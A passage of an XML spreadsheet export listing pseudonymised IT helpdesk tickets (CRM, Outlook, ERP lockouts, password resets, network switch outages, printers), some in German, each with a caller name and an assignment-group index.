    <s v="_x000a__x000a_received from: jhxwiply.midhcnze@gmail.com_x000a__x000a_not sure why or how but this error came up several times while attempting to add an email to crm_x000a_[cid:image001.png@01SID_355c1.93def6a0]_x000a__x000a__x000a_at the bottom of this email it shows it added the email to crm but i cannot find it anywhere_x000a_[cid:image004.png@01SID_355c3.16264ae0]_x000a__x000a__x000a__x000a__x000a_when i click on the 'view in crm' i get below error_x000a_[cid:image005.png@01SID_355c3.16264ae0]_x000a_[cid:image003.jpg@01SID_355c5.47cb4490]_x000a__x000a__x000a__x000a_why is it when i click on [cid:image002.png@01SID_355c6.2b4plant_200]  it opens up a new large crm page and shows i created a calendar date but it doesn't show in my regular crm even after closing it and reopening it?_x000a_[cid:image006.png@01SID_355c6.2b4plant_200]_x000a__x000a__x000a_this is what shows in my regular crm_x000a_[cid:image007.png@01SID_355c9.2121d1c0]_x000a__x000a__x000a__x000a_"/>
    <s v="jhxwiply midhcnze"/>
    <x v="39"/>
  </r>
  <r>
    <s v="vip 2: time setting on collaboration_platform"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ebikdrqw.empubwxo@gmail.com_x000d__x000a__x000d__x000a_i am experiencing problems with elt folders in collaboration_platform.  my collaboration_platform view for the elt meetings is not current and is not updating as documents are uploaded._x000d__x000a__x000d__x000a_i was told it has to do with my time setting on my pc.  lpoebzsc grknswyo i tried to reset it but the system did not reset it._x000d__x000a__x000d__x000a_please look into it and fix the problem._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ebikdrqw empubwxo"/>
    <x v="15"/>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dbfrevtj wbrpdxnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms crm installation ."/>
    <s v="ms crm installation ._x000d__x000a_connected to the user system using teamviewer._x000d__x000a_-installed the mscrm add in for outlook._x000d__x000a_-launched the outlook._x000d__x000a_-user able to see the crm add-in on outlook._x000d__x000a_-issue resolved."/>
    <s v="jkelxorm uwqjlzfm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zbxljotu cbunzrak ihre rechnung zur bestellung nr. 45507867717 vom 23.09.2016"/>
    <s v="zbxljotu cbunzrak ihre rechnung zur bestellung nr. 45507867717 vom 23.09.2016_x000a__x000a_error:  account to order no. 45507867717 from 09.23.2016"/>
    <s v="zbxljotu cbunzrak"/>
    <x v="26"/>
  </r>
  <r>
    <s v="outlook configuration and vpn connectivity"/>
    <s v="outlook configuration and vpn connectivity"/>
    <s v="tgewaniq yepifgbl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool login issue."/>
    <s v="engineering tool login issue._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-unlocked the user account._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="vyjmlain hvjbmdgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent help required- outlook to crm mfg_tooltion issue. "/>
    <s v="urgent help required- outlook to crm mfg_tooltion issue._x000a_need crm tab on my outlook"/>
    <s v="kvqtzayg ehjrviak"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell 7350: skype audio not working."/>
    <s v="dell 7350: skype audio not working._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-updated the sound drivers, restarted the pc._x000d__x000a_-user able to listen to the audio over the skype calls._x000d__x000a_-issue resolved."/>
    <s v="tmhflanr snbvcido"/>
    <x v="0"/>
  </r>
  <r>
    <s v="support with"/>
    <s v="_x000a__x000a_received from: jogtse.mhytusa@company.com_x000a__x000a_hello_x000a__x000a_could you please help us to add the customers below to engineering tool software_x000a__x000a_81945970_x000a__x000a_maquinados de precision de mex_x000a__x000a_81039422_x000a__x000a_magonza sa de cv_x000a__x000a_81039927_x000a__x000a_evercast s.a. de c.v._x000a__x000a_81030720_x000a__x000a_tecnologia en maquinados hidra_x000a__x000a__x000a__x000a_saludos_x000a__x000a__x000a_johjkse luartusa rahymos_x000a__x000a_representante de ventas zona bajio_x000a__x000a__x000a_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_x000a_[#+company/posts&gt;[_x000a_select the following link to view the disclaimer in an alternate language. _x000a__x000a__x000a__x000a_este mensaje estÃ¡ destinado al uso exclusivo de la persona a quien estÃ¡ dirigido y puede contener informaciÃ³n privilegiada, confidencial y que estÃ¡ exenta de ser revelada conforme con lo dispuesto en la legislaciÃ³n vigente. toda difusiÃ³n, distribuciÃ³n o reproducciÃ³n de este mensaje por parte de otra persona que no sea el receptor al que estÃ¡ destinado queda estrictamente prohibida. si recibe este mensaje por error, se ruega que lo notifique al remitente y borre este mensaje._x000a_[#+company/posts&gt;  [_x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="kwyozxgd gasxctph"/>
    <x v="25"/>
  </r>
  <r>
    <m/>
    <s v="_x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the portal._x000d__x000a_-issue resolved."/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ie issue"/>
    <s v="ie issue"/>
    <s v="ptljghyk qhtvlrxe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="multiple switch company-na-usa-usa is down since 2:15 pm et on 09/23/16"/>
    <s v="switch company-na-usa-usa-shippingarea-2960-access-sw01 (23.36.37.1866 )  and  company-na-usa-usa-furnace-2960-access-sw01 (80.25.07.069) located at usa is down  since 2:15 pm et"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="3"/>
  </r>
  <r>
    <s v="i drive not connecting "/>
    <s v="i drive not connecting _x000d__x000a__x000d__x000a_tried with ip address, no go._x000d__x000a_checked server name: no go_x000d__x000a_user mentioned that he changed his password for vpn and then not able to connect to i drive._x000d__x000a_rest all drivers are working fine and accessible._x000d__x000a_informed user to get in touch with one of colleagues and get the screen shot of all drivers he has access to also to onfiirm i drive._x000d__x000a_tried mapping i drive with password , nogo._x000d__x000a__x000d__x000a_waiting for user email ."/>
    <s v="tnhzdapi juqcbdzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="support with "/>
    <s v="_x000a__x000a_received from: whoyizfp.gclnfkis@gmail.com_x000a__x000a_hello_x000a__x000a_could you please help us to add the customers below to engineering tool software_x000a__x000a_81945970_x000a__x000a_maquinados de precision de mex_x000a__x000a_81039422_x000a__x000a_magonza sa de cv_x000a__x000a_81039927_x000a__x000a_evercast s.a. de c.v._x000a__x000a_81030720_x000a__x000a_tecnologia en maquinados hidra_x000a__x000a__x000a__x000a_saludos_x000a__x000a_whoyizfp gclnfkis._x000a_sr sales engineer_x000a_whoyizfp.gclnfkis@gmail.com&lt;mailto:mailo:whoyizfp.gclnfkis@gmail.com&gt;_x000a_"/>
    <s v="whoyizfp gclnfkis"/>
    <x v="25"/>
  </r>
  <r>
    <s v="locked er"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jxgobwrm.qkugdipo@gmail.com_x000d__x000a__x000d__x000a_i'm trying to add a change item to my er 2240766, but i get the error listed below_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01SID_3559d.48177471]_x000d__x000a__x000d__x000a_knethyen grechduy_x000d__x000a_engineer, product engineering_x000d__x000a_company_x000d__x000a_jxgobwrm.qkugdipo@gmail.com&lt;mailto:jxgobwrm.qkugdipo@gmail.com&gt;_x000d__x000a_t: (615 641-4399_x000d__x000a_f: (615) 641-4268_x000d__x000a__x000d__x000a_[cid:image001.jpg@01ced94a.22bd1f30]_x000d__x000a__x000d__x000a_company inc. | 1600 technology way | usa, pa. 15650 | www.company.com&lt;_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="jxgobwrm qkugdipo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem on trs"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bvpglyzh.dyhusejm@gmail.com_x000d__x000a__x000d__x000a_hello, i have this error while sending trs, connected to vpn, can you help me? "/>
    <s v="bvpglyzh dyhusejm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msd crm"/>
    <s v=" urgent help required - outlook to crm mfg_tooltion issue. _x000a__x000a_problem detail---after &quot;set regarding&quot; a calendar item to an account, it doesn't show in the assigned crm account record. _x000a_ph:_x000a_"/>
    <s v="goktenap kjnwotzq"/>
    <x v="22"/>
  </r>
  <r>
    <s v="ticket update for ticket_no0442691"/>
    <s v="ticket update for ticket_no0442691"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype error : getting skype certificate error"/>
    <s v="skype error : getting skype certificate error"/>
    <s v="xwzstlgj tzkbmgan"/>
    <x v="0"/>
  </r>
  <r>
    <s v="logon balancing error in erp even after connecting to vpn"/>
    <s v="unable to connect to erp modules even after connecting to vpn, logon balancing error =88._x000d__x000a_it was working 15 minutes back. "/>
    <s v="umkpayhc adflvbxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="infopath issue : "/>
    <s v="can not submit a discount through collaboration_platform._x000d__x000a__x000d__x000a_says access denied must add to favorites i had this happen before."/>
    <s v="kinryjcf pgetfijq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to mobile broadband"/>
    <s v="unable to connect to mobile broadband"/>
    <s v="imoelsap gxdwkimv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="qifzkoej etbmgjvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface: fastethernet0/6 Â· company-johthryugftyson-city-ap-2 on company-na-usa-johthryugftyson-city-2960-access-sw02.company.com is down "/>
    <s v="interface: fastethernet0/6 Â· company-johthryugftyson-city-ap-2 on company-na-usa-johthryugftyson-city-2960-access-sw02.company.com is down since 10:34 am on 09/23 et._x000d__x000a__x000d__x000a_logged on to switch found interface is down:_x000d__x000a__x000d__x000a_sep 23 10:32:09.262 edt: %lineproto-5-updown: line protocol on interface fastethernet0/6, changed state to down_x000d__x000a_sep 23 10:32:10.261 edt: %link-3-updown: interface fastethernet0/6, changed state to down_x000d__x000a_company-na-usa-johthryugftyson-city-2960-access-sw02&gt;$_x000d__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="nlrwqeti qarixwbv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="tqrylspg ijzghqwy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="vyjmlain hvjbmdgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio issue in dell 7350"/>
    <s v="name:ksgytjqr ojdukgzc_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ksgytjqr.ojdukgzc@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i cannot get the volume up high enough. it was fine yesterday now not high enough for conference calls."/>
    <s v="ksgytjqr ojdukgzc"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="oalprbtd nyxftpms"/>
    <x v="0"/>
  </r>
  <r>
    <s v="performance (speed) issue (mii)"/>
    <s v="order took 30 minutes to batch over from one work center bucket to the next._x000d__x000a_ _x000d__x000a_order 226020715_x000d__x000a_operation 30 - 7:45_x000d__x000a_operation 40/50 - 8:16_x000d__x000a__x000d__x000a_this has happened on multiple other orders as well._x000d__x000a__x000d__x000a_"/>
    <s v="juaxnvwz reampilj"/>
    <x v="40"/>
  </r>
  <r>
    <s v="outlook error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: doxmlcpr.xjheyscu@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_      i am not able to get into outlook any more. keep getting messages telling me its stopped working and do i want to restart in safe mode to do repair. have had to send this from my phone. "/>
    <s v="doxmlcpr xjheyscu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need the password_management_tool link"/>
    <s v="need the password_management_tool link"/>
    <s v="vybmcrxo kirxdspz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to tc78"/>
    <s v="unable to connect to tc78"/>
    <s v="csmhykge mpxbjudw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa village - clappdico:  company-na-usa-clappdico-wireless-2960-access-sw06 is down since at 9:46 am et on 09/23."/>
    <s v="usa village - clappdico:  company-na-usa-clappdico-wireless-2960-access-sw06 is down since at 9:46 am et on 09/23._x000d__x000a_gigabitethernet0/1 Â· ###connection to clappdico wireless switch 53.96.41.1370-company-na-usa-clappdico-2960-access-sw05 "/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="internet explorer issue"/>
    <s v="internet explorer issue"/>
    <s v="zcaeryfo tdovhslb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="fcpnodsr nbrdxscg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for oweklxnm ubayizsq on windows login"/>
    <s v="i try to change my log-in  password and the system keeps stating the old password is not correct.  and i disagree, because i tried so many times ( being careful), i know i  typed in my old password correctly."/>
    <s v="oweklxnm ubayizsq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="zyxjagro vjgozhpn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please unlock : tpfghtlugn (erp hana SID_60) do not reset password."/>
    <s v="please unlock : tpfghtlugn (erp hana SID_60) do not reset password."/>
    <s v="tivbxojn gorlajmp"/>
    <x v="52"/>
  </r>
  <r>
    <s v=" k100sfs.company.company.com is reporting a : down status on, HostName_343. please investigate"/>
    <s v="observing below alert in monitoring_tool since 8:49 am on 09/23 et._x000d__x000a_ k100sfs.company.company.com is reporting a : down status on, HostName_343. please investigate_x000d__x000a_cpu load is showing 100%"/>
    <s v="jloygrwh acvztedi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="crm in mobile phone"/>
    <s v="_x000a__x000a_received from: qjiutmel.fgvtxeoy@gmail.com_x000a__x000a_good morning,_x000a__x000a_crm on my mobile device will not work, please see below a screen shot._x000a__x000a_wghjkftewj_x000a__x000a_[cid:1d5bf51c-ed12-434b-940e-88747180d3e1]_x000a__x000a__x000a_"/>
    <s v="qjiutmel fgvtxeoy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to get emails synced on samsung mobile device"/>
    <s v="unable to get emails synced on samsung mobile device"/>
    <s v="vrjwyqtf qoxkapfw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset ad "/>
    <s v="password reset ad "/>
    <s v="ojgxundh aegxpmvd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="users are unable to connect to a machine in shop floor."/>
    <s v="users are unable to connect to a machine in shop floor_x000a__x000a_machine name - 391-mazak_x000a_contact n0 - ."/>
    <s v="pvlxjizg xzvlwqjc"/>
    <x v="3"/>
  </r>
  <r>
    <s v="pm_tool_for_sd: missing currency-table in pm_tool_for_sd-prod"/>
    <s v="from: jurten setgyrt _x000a_sent: friday, september 23, 2016 7:33 am_x000a_to: stefyty parkeyhrt &lt;esntuago.kwxrdhuv@gmail.com&gt;_x000a_cc: qikvnjzc evmrcqug &lt;qikvnjzc.evmrcqug@gmail.com&gt;_x000a_subject: aw: pm_tool_for_sd: missing currency-table in pm_tool_for_sd-prod.!!!_x000a__x000a_hello stefyty_x000a_any progress on that topic?_x000a__x000a_we are running in trouble because we have to send out two proposals but cannot because of missing pricing_x000a__x000a_best "/>
    <s v="crebvyhm nsegpdab"/>
    <x v="20"/>
  </r>
  <r>
    <s v="office reinstall"/>
    <s v="office reinstall"/>
    <s v="ejvkzobl yijgokrn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: need a little help--please"/>
    <s v="_x000a__x000a_received from: bcefayom.lzhwcgvb@gmail.com_x000a__x000a_lunjuws,_x000a__x000a_if you recall we had this new form developed when we were there for the tmb project specially as per bakyhrer huhuyghes  requirement._x000a__x000a__x000a_please don't print this email unless you really need to - this will preserve trees on planet earth._x000a__x000a_from: smxoklny hbecskgl_x000a_sent: 23 september 2016 17:45_x000a_to: damuphws arkulcoi;  an; company@ticketing_tool.com_x000a_cc: les_x000a_subject: re: need a little help--please_x000a__x000a_hcytr,_x000a_            is this format the one that bakyhrer huhuyghes required with their bin numbers on the delivery note?_x000a__x000a_shathyra,_x000a_            are you aware of the special requirement for bakyhrer huhuyghes  delivery notes?  i forgot about it until hcytr mentioned this._x000a__x000a_best "/>
    <s v="bcefayom lzhwcgvb"/>
    <x v="17"/>
  </r>
  <r>
    <s v="re: need a little help--please"/>
    <s v="_x000a__x000a_received from: smxoklny.hbecskgl@gmail.com_x000a__x000a_chanthrydru,_x000a_            is this format the one that bakyhrer huhuyghes required with their bin numbers on the delivery note?_x000a__x000a_shathyra,_x000a_            are you aware of the special requirement for bakyhrer huhuyghes delivery notes?  i forgot about it until chanthrydru mentioned this._x000a__x000a_best "/>
    <s v="khvzugxm yqfrcjwl"/>
    <x v="17"/>
  </r>
  <r>
    <s v="please include purchase group in pr to po analysis."/>
    <s v="please include field to enter aqzz/erpquery/memepr_3========_x000d__x000a__x000d__x000a_"/>
    <s v="jycshmvf uewramti"/>
    <x v="20"/>
  </r>
  <r>
    <s v="xerox in our office will not turn on, no power.  outlet where it's plugged in is good."/>
    <s v="xerox in our office will not turn on, no power.  outlet where it's plugged in is good."/>
    <s v="xzcwlqrv fjrdhiqt"/>
    <x v="2"/>
  </r>
  <r>
    <s v="rechner ewewx212455 ( olympus ) kein zugriff auf     \\HostName_736\EU_tool\   mÃ¶glich"/>
    <s v="rechner ewewx212455 ( olympus ) kein zugriff auf     \\HostName_736\EU_tool\   mÃ¶glich"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="printer not working"/>
    <s v="_x000a__x000a_received from: ugyawsjv.ypgjirlm@gmail.com_x000a__x000a_dear sir,_x000a__x000a_the printer at msg second floor \\awyrthysm010\\w46&lt;file:///\\awyrthysm010\w46&gt; is not working._x000a__x000a_please rectify the problem immediately._x000a__x000a_"/>
    <s v="ugyawsjv ypgjirlm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ms outlook doens't start"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tzradpnj.izlotycb@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a__x000d__x000a_as many times before, after system password change, ms outlook doens't start._x000d__x000a_attached printscreen._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="tzradpnj izlotycb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_488 failed in job_scheduler at: 09/23/2016 06:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_488 failed in job_scheduler at: 09/23/2016 06:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="co account assignments have different profit centers "/>
    <s v="from: rzucjgvp ioqjgmah _x000a_sent: friday, september 23, 2016 12:09 pm_x000a_to: subgtybaryuao hs; nyifqpmv kfirxjag_x000a_subject: re: erro log-reg_x000a__x000a_hi sutyu,_x000a__x000a_this seems to be related to co issue.  i am requesting co person to look into this issue._x000a__x000a_hi ramdntyassthywamy,_x000a__x000a_please help mr.subgtybaryuao on this._x000a__x000a_"/>
    <s v="eyxngjol lohcygnf"/>
    <x v="43"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000a__x000a_enter user id of user having the issue:_x000a_magerjtyhd_x000a_yadavtghya_x000a_schgtewmik_x000a_transaction code(s) the user needs or was working with:_x000a_zcopc_x000a__x000a_describe the issue:_x000a_please remove the plant controller role from all three users. i have discussed with uylvgtfi eovkxgpn. he and obdphylz qaeicrkz do not need access again to zcopc. qbjmoihg nbgvyqac needs it but i would prefer if you could assign the role co:team_view for her instead of plant controller. _x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user:"/>
    <s v="ipwjorsc uboapexr"/>
    <x v="19"/>
  </r>
  <r>
    <s v="install EU_tool und bls \ rechner  olympus \xwirzvda okhyipgr"/>
    <s v="install EU_tool und bls \ rechner  olympus \xwirzvda okhyipgr"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="schreib- und leseberechtigung auf den ordner  m:\staebefertigung-leitung einrichten"/>
    <s v="hallo ,_x000d__x000a__x000d__x000a_bitte schreib- und leseberechtigung fÃ¼r user maerza auf den ordner  m:\staebefertigung-leitung einrichten._x000d__x000a__x000d__x000a_danke_x000d__x000a_"/>
    <s v="htvepyua izgulrcf"/>
    <x v="24"/>
  </r>
  <r>
    <s v="dds"/>
    <s v="dss"/>
    <s v="onctqhsg cpahzsle"/>
    <x v="0"/>
  </r>
  <r>
    <s v="info type '0017' missing to personal number 56678054"/>
    <s v="from: fbgetczn jlsvxura _x000d__x000a_sent: friday, september 23, 2016 10:15 am_x000d__x000a_to: nyifqpmv kfirxjag_x000d__x000a_cc: wjkzgyxh pktcqbxu_x000d__x000a_subject: aw: unterhaltung mit nyifqpmv kfirxjag_x000d__x000a__x000d__x000a_hello hr. ramdntyassthywamy,_x000d__x000a_sebfghkasthian asked me to send you the below attached screen shots._x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="fbgetczn jlsvxura"/>
    <x v="9"/>
  </r>
  <r>
    <s v="request access to SID_1 uacyltoe hxgaycze"/>
    <s v="_x000a__x000a_received from: gkerqucv.bqumyrea@gmail.com_x000a__x000a_good day,_x000a__x000a_jfhytu mthyuleng_x000a_senior buyer_x000a_gkerqucv.bqumyrea@gmail.com_x000a__x000a_[company 75th anniversary logo]_x000a_"/>
    <s v="gkerqucv bqumyrea"/>
    <x v="0"/>
  </r>
  <r>
    <s v="setup new ws \ewew8323879 \jionmpsf wnkpzcmv"/>
    <s v="setup new ws \ewew8323879 \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="drucker von cvd we17  einrichten am pc 212536 in der qs"/>
    <s v="drucker von cvd we17  einrichten am pc 212536 in der qs"/>
    <s v="hnyeajrw ctxjsolz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="outlook issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rgtarthi.erjgypa@company.com_x000d__x000a__x000d__x000a_hello help,_x000d__x000a__x000d__x000a_outlook is not getting updated automatically &amp; periodically,_x000d__x000a_time to time i need to update send &amp; receive folder. this issue persists since last wednesday ( 14th sep)._x000d__x000a__x000d__x000a_system was given to the it dept here on 21st  but there is no improvement._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01SID_355a1.ee766460]_x000d__x000a__x000d__x000a_"/>
    <s v="xqoljzbh aydcwkxt"/>
    <x v="26"/>
  </r>
  <r>
    <s v="probleme mit collaboration_platform / infopath \difozlav dgbfptos"/>
    <s v="probleme mit collaboration_platform / infopath \difozlav dgbfptos"/>
    <s v="difozlav dgbfptos"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp pur - wrong subcontracting demand 2nd material "/>
    <s v="hello,_x000d__x000a_with component 2433384 we see a wrong subcontracting demand in erp coming from parent  3181756. _x000d__x000a_the strange thing is that the po referenced is not a subcontracting po. _x000d__x000a_we need to understand whatÂ´s going wrong here and need to remove the incorrect demand. _x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="tckyrinp vbzqslco"/>
    <x v="29"/>
  </r>
  <r>
    <s v="HostName_1379: volume: h:\is over 85% space consumed. space available: 2.0 g "/>
    <s v="volume: h:\ label:dat4-HostName_1379-data e3fce49 on server: is over _x000d__x000a_85% space consumed. space available: 2.0 g "/>
    <s v="bozdftwx smylqejw"/>
    <x v="38"/>
  </r>
  <r>
    <s v="owa does not open."/>
    <s v="owa does not open. _x000d__x000a_error : page can not be displayed"/>
    <s v="wczrtsja crwioekx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1379 : volume: c:\ is over 85% space consumed. space available: 3.5 g :"/>
    <s v="volume: c:\ label:sys-HostName_1379 28385a7b on server: is over _x000d__x000a_85% space consumed. space available: 3.5 g :"/>
    <s v="bozdftwx smylqejw"/>
    <x v="38"/>
  </r>
  <r>
    <s v="user tempuser changed the layout in fb03 to be the default setting for everyone"/>
    <s v="erp SID_34, finance:_x000d__x000a_user tempuser changed the layout in fb03 (/jinf(a)) to be the default setting for everyone. we tried to figure out which layout was the default before., i have chosen /2erp for now, but don't know exactly if this really was the default. ._x000d__x000a_this happens from time to time, some users are not aware that they set a default for everyone.  "/>
    <s v="ipwjorsc uboapexr"/>
    <x v="9"/>
  </r>
  <r>
    <s v="keine netzwerkverbindung fÃ¼r rechner vhw7020 "/>
    <s v="bitte netzwerkverbindung fÃ¼r rechner vhw7020 herstellen (alicona messraum cs halle a)"/>
    <s v="wogicpdt jbdyzmhf"/>
    <x v="32"/>
  </r>
  <r>
    <s v="appreciate hub password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xwertljy.zrmlhkyq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please reset my appreciate hub password._x000d__x000a__x000d__x000a_"/>
    <s v="xwertljy zrmlhkyq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account &quot;helftgyldt&quot; gesperrt"/>
    <s v="anmeldung bei account &quot;helftgyldt&quot; nicht mÃ¶glich. fehlermeldung : &quot;das angesprochene konto ist momentan gesperrt und kann nicht fÃ¼r die anmeldung verwendet werden.&quot;"/>
    <s v="kbcedtiq jxnzpgwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for qoybxkfh dwcmxuea using password_management_tool password reset."/>
    <s v="the"/>
    <s v="qoybxkfh dwcmxuea"/>
    <x v="16"/>
  </r>
  <r>
    <s v="outlook takes too much time to open."/>
    <s v="outlook takes too much time to open."/>
    <s v="rxgvfoub fhqmvwrd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to change password through password_management_tool"/>
    <s v="unable to change password through password_management_tool"/>
    <s v="ypuaejsc yoxrqtsn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account &quot;jncvkrzm thjquiyl&quot; gesperrt"/>
    <s v="anmeldung bei account &quot;jncvkrzm thjquiyl&quot; nicht mÃ¶glich. fehlermeldung : &quot;das angesprochene konto ist momentan gesperrt und kann nicht fÃ¼r die anmeldung verwendet werden.&quot;"/>
    <s v="kbcedtiq jxnzpgwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access for printer wy15 for trainee"/>
    <s v="_x000a__x000a_received from: jczwxvdn.pexuklry@gmail.com_x000a__x000a_hi,_x000a__x000a_please provide access to wy15 printer (machine tool business) for below trainee._x000a__x000a_trainee name: blapmcwk dgrkbnua k_x000a_login id: vvkusgtms4_x000a_computer no.: awyw8911656_x000a__x000a_"/>
    <s v="jczwxvdn pexuklry"/>
    <x v="18"/>
  </r>
  <r>
    <s v="error when pgi for with t&amp;d delivery 9169324512 "/>
    <s v="gso,_x000d__x000a_please open an it ticket for the erp co group to review the issue below with t&amp;d delivery 9169324512 where pgi does not work because of co assignment having different profit centers._x000d__x000a__x000d__x000a_"/>
    <s v="aeiljfxg hzwxtyjr"/>
    <x v="43"/>
  </r>
  <r>
    <s v="account lock release request of &quot;nakagtwsgs&quot;"/>
    <s v="hi team,_x000a__x000a_please unlock the windows account &quot;nakagtwsgs&quot;._x000a__x000a_user nameï¼šqwghlvdx pjwvdiuz _x000a__x000a__x000a_best "/>
    <s v="gworzkhc inypbucg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset -hsh"/>
    <s v="hello:_x000a__x000a_one of the workman aqihfoly xsrkthvf whose user id is hsh is not able to login to ess as his user id locked.  he is a kiosk user.  please  re-set his password and confirm._x000a__x000a_noscwdpm akiowsmp_x000a_manager, hr shared services center_x000a_noscwdpm.akiowsmp@gmail.com _x000a_"/>
    <s v="noscwdpm akiowsmp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="picture in collaboration_platform / outlook / skype (user: faerfrtbj)"/>
    <s v="my profile shows different pictures on collaboration_platform / outlook / skype. see attached screenshots. the correct one should be the one shown on attachment &quot;actual.jpg&quot;"/>
    <s v="gwrkhufx gsfrlqwi"/>
    <x v="15"/>
  </r>
  <r>
    <s v="job Job_485 failed in job_scheduler at: 09/23/2016 02:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_485 failed in job_scheduler at: 09/23/2016 02:31:00_x000d__x000a__x000d__x000a_9/23/2016 1:05:55 am :: unable to release guest. error: failed to unfreeze guest system (network mode)_x000d__x000a_rpc function call failed. function name: [unfreeze]. target machine: [10.2.18.54]._x000d__x000a_rpc error:the remote procedure call failed._x000d__x000a_ code: 1726 _x000d__x000a_"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="_x000a__x000a_received from: bctypmjw.cbhnxafz@gmail.com_x000a__x000a_dear collegues,_x000a__x000a_i need a password reset for erp hrp modul._x000a__x000a_username: rethtyuzkd_x000a__x000a_gruÃŸ/"/>
    <s v="bctypmjw cbhnxafz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can i be allowed to use dropbox ?"/>
    <s v="marcom team has assigned a task of proofreading.  it requires me to download into dropdox.  "/>
    <s v="obfgkwim hlasbrmj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp account gesperrt"/>
